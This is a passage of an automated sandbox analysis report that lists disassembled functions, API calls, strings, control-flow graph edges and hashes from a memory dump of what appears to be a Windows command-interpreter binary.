                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                      • API String ID: 1049357271-3021193919
                                                      • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                      • Instruction ID: 359a3c70616b9cacae5f44e083aeee61fc86ae4e41e3989a39ae451a5ba3c388
                                                      • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                      • Instruction Fuzzy Hash: 17C17261E08A4296EB04FB11A806379F7A0FF89B91FC48536D90E43395DFBCE545C3A2
                                                      Function 00007FF7E1DC3C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 732 7ff7e1dc3c24-7ff7e1dc3c61 733 7ff7e1dc3c67-7ff7e1dc3c99 call 7ff7e1dbaf14 call 7ff7e1dbca40 732->733 734 7ff7e1dcec5a-7ff7e1dcec5f 732->734 743 7ff7e1dc3c9f-7ff7e1dc3cb2 call 7ff7e1dbb900 733->743 744 7ff7e1dcec97-7ff7e1dceca1 call 7ff7e1dc855c 733->744 734->733 736 7ff7e1dcec65-7ff7e1dcec6a 734->736 738 7ff7e1dc412e-7ff7e1dc415b call 7ff7e1dc8f80 736->738 743->744 749 7ff7e1dc3cb8-7ff7e1dc3cbc 743->749 750 7ff7e1dc3cbf-7ff7e1dc3cc7 749->750 750->750 751 7ff7e1dc3cc9-7ff7e1dc3ccd 750->751 752 7ff7e1dc3cd2-7ff7e1dc3cd8 751->752 753 7ff7e1dc3ce5-7ff7e1dc3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff7e1dc3cda-7ff7e1dc3cdf 752->754 756 7ff7e1dc3fb8 753->756 757 7ff7e1dc3d68-7ff7e1dc3d6c 753->757 754->753 755 7ff7e1dc3faa-7ff7e1dc3fb3 754->755 755->752 759 7ff7e1dc3fc6-7ff7e1dc3fec GetLastError call 7ff7e1dc855c call 7ff7e1dca5d6 756->759 757->756 758 7ff7e1dc3d72-7ff7e1dc3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7e1dc3dd3-7ff7e1dc3ddd 758->760 762 7ff7e1dc3ff1-7ff7e1dc4007 call 7ff7e1dc855c _local_unwind 759->762 760->762 763 7ff7e1dc3de3-7ff7e1dc3dfb 760->763 774 7ff7e1dc400c-7ff7e1dc4022 GetLastError 762->774 765 7ff7e1dc3e01-7ff7e1dc3e11 763->765 766 7ff7e1dc40fe-7ff7e1dc4119 call 7ff7e1dc855c _local_unwind 763->766 765->766 770 7ff7e1dc3e17-7ff7e1dc3e28 765->770 775 7ff7e1dc411a-7ff7e1dc412c call 7ff7e1dbff70 call 7ff7e1dc855c 766->775 773 7ff7e1dc3e2c-7ff7e1dc3e34 770->773 773->773 776 7ff7e1dc3e36-7ff7e1dc3e3f 773->776 777 7ff7e1dc3e95-7ff7e1dc3e9c 774->777 778 7ff7e1dc4028-7ff7e1dc402b 774->778 775->738 783 7ff7e1dc3e42-7ff7e1dc3e55 776->783 780 7ff7e1dc3ecf-7ff7e1dc3ed3 777->780 781 7ff7e1dc3e9e-7ff7e1dc3ec2 call 7ff7e1dc2978 777->781 778->777 779 7ff7e1dc4031-7ff7e1dc4047 call 7ff7e1dc855c _local_unwind 778->779 799 7ff7e1dc404c-7ff7e1dc4062 call 7ff7e1dc855c _local_unwind 779->799 788 7ff7e1dc3ed5-7ff7e1dc3ef7 GetFileAttributesW 780->788 789 7ff7e1dc3f08-7ff7e1dc3f0b 780->789 793 7ff7e1dc3ec7-7ff7e1dc3ec9 781->793 784 7ff7e1dc3e66-7ff7e1dc3e8f GetFileAttributesW 783->784 785 7ff7e1dc3e57-7ff7e1dc3e60 783->785 784->774 784->777 785->784 791 7ff7e1dc3f9d-7ff7e1dc3fa5 785->791 794 7ff7e1dc4067-7ff7e1dc4098 GetLastError call 7ff7e1dc855c _local_unwind 788->794 795 7ff7e1dc3efd-7ff7e1dc3f02 788->795 797 7ff7e1dc3f1e-7ff7e1dc3f40 SetCurrentDirectoryW 789->797 798 7ff7e1dc3f0d-7ff7e1dc3f11 789->798 791->783 793->780 793->799 801 7ff7e1dc409d-7ff7e1dc40b3 call 7ff7e1dc855c _local_unwind 794->801 795->789 795->801 803 7ff7e1dc3f46-7ff7e1dc3f69 call 7ff7e1dc498c 797->803 805 7ff7e1dc40b8-7ff7e1dc40de GetLastError call 7ff7e1dc855c _local_unwind 797->805 798->803 804 7ff7e1dc3f13-7ff7e1dc3f1c 798->804 799->794 801->805 815 7ff7e1dc3f6f-7ff7e1dc3f98 call 7ff7e1dc417c 803->815 816 7ff7e1dc40e3-7ff7e1dc40f9 call 7ff7e1dc855c _local_unwind 803->816 804->797 804->803 805->816 815->775 816->766
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                      • String ID: :
                                                      • API String ID: 1809961153-336475711
                                                      • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                      • Instruction ID: 4ec76dc31363dbd345fda882f7e6bc98f7d0c1f480bb4d0d3ff1ce62d33001d8
                                                      • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                      • Instruction Fuzzy Hash: ADD15F32A18B8591EB20EB15E4463B9F7A1FB84740F848A37DA8E437A4DFBCE444C751
                                                      Function 00007FF7E1DC2394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 914 7ff7e1dc2394-7ff7e1dc2416 memset call 7ff7e1dbca40 917 7ff7e1dce0d2-7ff7e1dce0da call 7ff7e1dc4c1c 914->917 918 7ff7e1dc241c-7ff7e1dc2453 GetModuleFileNameW call 7ff7e1dc081c 914->918 923 7ff7e1dce0db-7ff7e1dce0ee call 7ff7e1dc498c 917->923 918->923 924 7ff7e1dc2459-7ff7e1dc2468 call 7ff7e1dc081c 918->924 929 7ff7e1dce0f4-7ff7e1dce107 call 7ff7e1dc498c 923->929 924->929 930 7ff7e1dc246e-7ff7e1dc247d call 7ff7e1dc081c 924->930 939 7ff7e1dce10d-7ff7e1dce123 929->939 935 7ff7e1dc2516-7ff7e1dc2529 call 7ff7e1dc498c 930->935 936 7ff7e1dc2483-7ff7e1dc2492 call 7ff7e1dc081c 930->936 935->936 936->939 947 7ff7e1dc2498-7ff7e1dc24a7 call 7ff7e1dc081c 936->947 942 7ff7e1dce125-7ff7e1dce139 wcschr 939->942 943 7ff7e1dce13f-7ff7e1dce17a _wcsupr 939->943 942->943 944 7ff7e1dce27c 942->944 945 7ff7e1dce181-7ff7e1dce199 wcsrchr 943->945 946 7ff7e1dce17c-7ff7e1dce17f 943->946 949 7ff7e1dce283-7ff7e1dce29b call 7ff7e1dc498c 944->949 948 7ff7e1dce19c 945->948 946->948 956 7ff7e1dce2a1-7ff7e1dce2c3 _wcsicmp 947->956 957 7ff7e1dc24ad-7ff7e1dc24c5 call 7ff7e1dc3c24 947->957 951 7ff7e1dce1a0-7ff7e1dce1a7 948->951 949->956 951->951 954 7ff7e1dce1a9-7ff7e1dce1bb 951->954 958 7ff7e1dce264-7ff7e1dce277 call 7ff7e1dc1300 954->958 959 7ff7e1dce1c1-7ff7e1dce1e6 954->959 964 7ff7e1dc24ca-7ff7e1dc24db 957->964 958->944 962 7ff7e1dce1e8-7ff7e1dce1f1 959->962 963 7ff7e1dce21a 959->963 965 7ff7e1dce1f3-7ff7e1dce1f6 962->965 966 7ff7e1dce201-7ff7e1dce210 962->966 969 7ff7e1dce21d-7ff7e1dce21f 963->969 967 7ff7e1dc24e9-7ff7e1dc2514 call 7ff7e1dc8f80 964->967 968 7ff7e1dc24dd-7ff7e1dc24e4 ??_V@YAXPEAX@Z 964->968 965->966 970 7ff7e1dce1f8-7ff7e1dce1ff 965->970 966->963 971 7ff7e1dce212-7ff7e1dce218 966->971 968->967 969->949 973 7ff7e1dce221-7ff7e1dce228 969->973 970->965 970->966 971->969 975 7ff7e1dce254-7ff7e1dce262 973->975 976 7ff7e1dce22a-7ff7e1dce231 973->976 975->944 977 7ff7e1dce234-7ff7e1dce237 976->977 977->975 978 7ff7e1dce239-7ff7e1dce242 977->978 978->975 979 7ff7e1dce244-7ff7e1dce252 978->979 979->975 979->977
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                      • API String ID: 2622545777-4197029667
                                                      • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                      • Instruction ID: e3ce112b628bd6a685205ba7cf54b56763ecfaa58bffd89a1914da3c8a3066ec
                                                      • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                      • Instruction Fuzzy Hash: 69919161B0968285EF25EB10D8523B9E7A5FF44B44FC48536C90E87695DFBCE504C3A2
                                                      Function 00007FF7E1DC0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode_get_osfhandle
                                                      • String ID: CMD.EXE
                                                      • API String ID: 1606018815-3025314500
                                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                      • Instruction ID: 305bc909e2150de27535e9c9249add56f83aa816bc878c3d18c7c9d81822ff7b
                                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                      • Instruction Fuzzy Hash: F141F035E09A029BE708EB15E846378BB60FB89752FC4D176C51E83364DFBCA514C662
                                                      Function 00007FF7E1DBC620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 992 7ff7e1dbc620-7ff7e1dbc66f GetConsoleTitleW 993 7ff7e1dbc675-7ff7e1dbc687 call 7ff7e1dbaf14 992->993 994 7ff7e1dcc5f2 992->994 998 7ff7e1dbc689 993->998 999 7ff7e1dbc68e-7ff7e1dbc69d call 7ff7e1dbca40 993->999 997 7ff7e1dcc5fc-7ff7e1dcc60c GetLastError 994->997 1000 7ff7e1dcc5e3 call 7ff7e1db3278 997->1000 998->999 1004 7ff7e1dcc5e8-7ff7e1dcc5ed call 7ff7e1dc855c 999->1004 1005 7ff7e1dbc6a3-7ff7e1dbc6ac 999->1005 1000->1004 1004->994 1007 7ff7e1dbc6b2-7ff7e1dbc6c5 call 7ff7e1dbb9c0 1005->1007 1008 7ff7e1dbc954-7ff7e1dbc95e call 7ff7e1dc291c 1005->1008 1015 7ff7e1dbc9b5-7ff7e1dbc9b8 call 7ff7e1dc5c6c 1007->1015 1016 7ff7e1dbc6cb-7ff7e1dbc6ce 1007->1016 1013 7ff7e1dbc964-7ff7e1dbc972 call 7ff7e1db89c0 1008->1013 1014 7ff7e1dcc5de-7ff7e1dcc5e0 1008->1014 1013->997 1026 7ff7e1dbc978-7ff7e1dbc99a towupper 1013->1026 1014->1000 1020 7ff7e1dbc9bd-7ff7e1dbc9c9 call 7ff7e1dc855c 1015->1020 1016->1004 1019 7ff7e1dbc6d4-7ff7e1dbc6e9 1016->1019 1022 7ff7e1dcc616-7ff7e1dcc620 call 7ff7e1dc855c 1019->1022 1023 7ff7e1dbc6ef-7ff7e1dbc6fa 1019->1023 1038 7ff7e1dbc9d0-7ff7e1dbc9d7 1020->1038 1028 7ff7e1dcc627 1022->1028 1027 7ff7e1dbc700-7ff7e1dbc713 1023->1027 1023->1028 1033 7ff7e1dbc9a0-7ff7e1dbc9a9 1026->1033 1029 7ff7e1dcc631 1027->1029 1030 7ff7e1dbc719-7ff7e1dbc72c 1027->1030 1028->1029 1035 7ff7e1dcc63b 1029->1035 1034 7ff7e1dbc732-7ff7e1dbc747 call 7ff7e1dbd3f0 1030->1034 1030->1035 1033->1033 1036 7ff7e1dbc9ab-7ff7e1dbc9af 1033->1036 1045 7ff7e1dbc74d-7ff7e1dbc750 1034->1045 1046 7ff7e1dbc8ac-7ff7e1dbc8af 1034->1046 1043 7ff7e1dcc645 1035->1043 1036->1015 1039 7ff7e1dcc60e-7ff7e1dcc611 call 7ff7e1ddec14 1036->1039 1041 7ff7e1dbc872-7ff7e1dbc8aa call 7ff7e1dc855c call 7ff7e1dc8f80 1038->1041 1042 7ff7e1dbc9dd-7ff7e1dcc6da SetConsoleTitleW 1038->1042 1039->1022 1042->1041 1053 7ff7e1dcc64e-7ff7e1dcc651 1043->1053 1049 7ff7e1dbc752-7ff7e1dbc764 call 7ff7e1dbbd38 1045->1049 1050 7ff7e1dbc76a-7ff7e1dbc76d 1045->1050 1046->1045 1052 7ff7e1dbc8b5-7ff7e1dbc8d3 wcsncmp 1046->1052 1049->1004 1049->1050 1056 7ff7e1dbc840-7ff7e1dbc84b call 7ff7e1dbcb40 1050->1056 1057 7ff7e1dbc773-7ff7e1dbc77a 1050->1057 1052->1050 1058 7ff7e1dbc8d9 1052->1058 1059 7ff7e1dcc657-7ff7e1dcc65b 1053->1059 1060 7ff7e1dbc80d-7ff7e1dbc811 1053->1060 1078 7ff7e1dbc856-7ff7e1dbc86c 1056->1078 1079 7ff7e1dbc84d-7ff7e1dbc855 call 7ff7e1dbcad4 1056->1079 1065 7ff7e1dbc780-7ff7e1dbc784 1057->1065 1058->1045 1059->1060 1061 7ff7e1dbc9e2-7ff7e1dbc9e7 1060->1061 1062 7ff7e1dbc817-7ff7e1dbc81b 1060->1062 1061->1062 1069 7ff7e1dbc9ed-7ff7e1dbc9f7 call 7ff7e1dc291c 1061->1069 1067 7ff7e1dbc821 1062->1067 1068 7ff7e1dbca1b-7ff7e1dbca1f 1062->1068 1070 7ff7e1dbc78a-7ff7e1dbc7a4 wcschr 1065->1070 1071 7ff7e1dbc83d 1065->1071 1074 7ff7e1dbc824-7ff7e1dbc82d 1067->1074 1068->1067 1073 7ff7e1dbca25-7ff7e1dcc6b3 call 7ff7e1db3278 1068->1073 1089 7ff7e1dcc684-7ff7e1dcc698 call 7ff7e1db3278 1069->1089 1090 7ff7e1dbc9fd-7ff7e1dbca00 1069->1090 1076 7ff7e1dbc7aa-7ff7e1dbc7ad 1070->1076 1077 7ff7e1dbc8de-7ff7e1dbc8f7 1070->1077 1071->1056 1073->1004 1074->1074 1081 7ff7e1dbc82f-7ff7e1dbc837 1074->1081 1083 7ff7e1dbc7b0-7ff7e1dbc7b8 1076->1083 1084 7ff7e1dbc900-7ff7e1dbc908 1077->1084 1078->1038 1078->1041 1079->1078 1081->1065 1081->1071 1083->1083 1091 7ff7e1dbc7ba-7ff7e1dbc7c7 1083->1091 1084->1084 1092 7ff7e1dbc90a-7ff7e1dbc915 1084->1092 1089->1004 1090->1062 1095 7ff7e1dbca06-7ff7e1dbca10 call 7ff7e1db89c0 1090->1095 1091->1053 1096 7ff7e1dbc7cd-7ff7e1dbc7db 1091->1096 1097 7ff7e1dbc93a-7ff7e1dbc944 1092->1097 1098 7ff7e1dbc917 1092->1098 1095->1062 1114 7ff7e1dbca16-7ff7e1dcc67f GetLastError call 7ff7e1db3278 1095->1114 1099 7ff7e1dbc7e0-7ff7e1dbc7e7 1096->1099 1102 7ff7e1dbca2a-7ff7e1dbca2f call 7ff7e1dc9158 1097->1102 1103 7ff7e1dbc94a 1097->1103 1100 7ff7e1dbc920-7ff7e1dbc928 1098->1100 1105 7ff7e1dbc800-7ff7e1dbc803 1099->1105 1106 7ff7e1dbc7e9-7ff7e1dbc7f1 1099->1106 1107 7ff7e1dbc932-7ff7e1dbc938 1100->1107 1108 7ff7e1dbc92a-7ff7e1dbc92f 1100->1108 1102->1014 1103->1008 1105->1043 1112 7ff7e1dbc809 1105->1112 1106->1105 1111 7ff7e1dbc7f3-7ff7e1dbc7fe 1106->1111 1107->1097 1107->1100 1108->1107 1111->1099 1111->1105 1112->1060 1114->1004
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleTitlewcschr
                                                      • String ID: /$:
                                                      • API String ID: 2364928044-4222935259
                                                      • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                      • Instruction ID: 5652382e6586cbacfea63a5d71d9cb95beb8bfa4e2eb34bd2aa80afd744bc34c
                                                      • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                      • Instruction Fuzzy Hash: 8EC1AF61E18642A1FB24FB15D416BB9A2A0FF84B90FC88537DA1F462D5DFBCE440C362
                                                      Function 00007FF7E1DC8D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1171 7ff7e1dc8d80-7ff7e1dc8da2 1172 7ff7e1dc8da4-7ff7e1dc8daf 1171->1172 1173 7ff7e1dc8db1-7ff7e1dc8db4 1172->1173 1174 7ff7e1dc8dcc 1172->1174 1175 7ff7e1dc8db6-7ff7e1dc8dbd 1173->1175 1176 7ff7e1dc8dbf-7ff7e1dc8dca Sleep 1173->1176 1177 7ff7e1dc8dd1-7ff7e1dc8dd9 1174->1177 1175->1177 1176->1172 1178 7ff7e1dc8ddb-7ff7e1dc8de5 _amsg_exit 1177->1178 1179 7ff7e1dc8de7-7ff7e1dc8def 1177->1179 1180 7ff7e1dc8e4c-7ff7e1dc8e54 1178->1180 1181 7ff7e1dc8e46 1179->1181 1182 7ff7e1dc8df1-7ff7e1dc8e0a 1179->1182 1184 7ff7e1dc8e73-7ff7e1dc8e75 1180->1184 1185 7ff7e1dc8e56-7ff7e1dc8e69 _initterm 1180->1185 1181->1180 1183 7ff7e1dc8e0e-7ff7e1dc8e11 1182->1183 1186 7ff7e1dc8e13-7ff7e1dc8e15 1183->1186 1187 7ff7e1dc8e38-7ff7e1dc8e3a 1183->1187 1188 7ff7e1dc8e80-7ff7e1dc8e88 1184->1188 1189 7ff7e1dc8e77-7ff7e1dc8e79 1184->1189 1185->1184 1192 7ff7e1dc8e3c-7ff7e1dc8e41 1186->1192 1193 7ff7e1dc8e17-7ff7e1dc8e1b 1186->1193 1187->1180 1187->1192 1190 7ff7e1dc8eb4-7ff7e1dc8ec8 call 7ff7e1dc37d8 1188->1190 1191 7ff7e1dc8e8a-7ff7e1dc8e98 call 7ff7e1dc94f0 1188->1191 1189->1188 1200 7ff7e1dc8ecd-7ff7e1dc8eda 1190->1200 1191->1190 1201 7ff7e1dc8e9a-7ff7e1dc8eaa 1191->1201 1198 7ff7e1dc8f28-7ff7e1dc8f3d 1192->1198 1195 7ff7e1dc8e2d-7ff7e1dc8e36 1193->1195 1196 7ff7e1dc8e1d-7ff7e1dc8e29 1193->1196 1195->1183 1196->1195 1203 7ff7e1dc8ee4-7ff7e1dc8eeb 1200->1203 1204 7ff7e1dc8edc-7ff7e1dc8ede exit 1200->1204 1201->1190 1205 7ff7e1dc8eed-7ff7e1dc8ef3 _cexit 1203->1205 1206 7ff7e1dc8ef9 1203->1206 1204->1203 1205->1206 1206->1198
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                      • String ID:
                                                      • API String ID: 4291973834-0
                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                      • Instruction ID: 670618e5eb25f9c9fc1a6c64f9bb240db8d93f711c49c73dc78f429ce4a5940a
                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                      • Instruction Fuzzy Hash: 6D410831E08A0386FB54FB14E882735A2A4EF44745F859937D90D876A0DFFDE890C7A2
                                                      Function 00007FF7E1DC4A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1207 7ff7e1dc4a14-7ff7e1dc4a3e GetEnvironmentStringsW 1208 7ff7e1dc4a40-7ff7e1dc4a46 1207->1208 1209 7ff7e1dc4aae-7ff7e1dc4ac5 1207->1209 1210 7ff7e1dc4a59-7ff7e1dc4a8f GetProcessHeap HeapAlloc 1208->1210 1211 7ff7e1dc4a48-7ff7e1dc4a52 1208->1211 1213 7ff7e1dc4a91-7ff7e1dc4a9a memmove 1210->1213 1214 7ff7e1dc4a9f-7ff7e1dc4aa9 FreeEnvironmentStringsW 1210->1214 1211->1211 1212 7ff7e1dc4a54-7ff7e1dc4a57 1211->1212 1212->1210 1212->1211 1213->1214 1214->1209
                                                      APIs
                                                      • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                      • memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
